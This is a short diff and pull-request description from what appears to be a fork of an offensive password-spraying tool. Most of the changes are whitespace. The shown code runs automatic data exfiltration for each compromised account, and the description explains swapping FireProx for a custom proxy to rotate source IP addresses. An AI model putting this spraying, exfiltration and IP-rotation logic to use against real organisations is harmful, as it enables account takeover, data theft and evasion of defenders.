+				//await _globalProperties._awsHandler.DeleteFireProxEndpoint(fireProxObject.Item1.RestApiId, fireProxObject.Item2.Region);
+			}
 
 
-            if (autoExfilBool && validAccounts.Count() > 0)
-            {
-                foreach (var item in validAccounts)
-                {
-                    databaseHandle.WriteLog(new Log("SPRAY", $"Launching automatic exfiltration"));
-                    await Exfiltrate.ExfiltrateAsync(args, item.Username, databaseHandle);
-                }
+			if (autoExfilBool && validAccounts.Count() > 0)
+			{
+				foreach (var item in validAccounts)
+				{
+					databaseHandle.WriteLog(new Log("SPRAY", $"Launching automatic exfiltration"));
+					await Exfiltrate.ExfiltrateAsync(args, item.Username, databaseHandle);
+				}
 
-            }
+			}
 
-            goto sprayCalc;
-        }
+			goto sprayCalc;
+		}
 
-    }
+	}
 
 }
-


### PR DESCRIPTION
Quick & Dirty changes so that FireProx won't be used anymore in this forked version. Instead, Operators can specify another providers custom proxy in the configuration file for random IP-Addresses.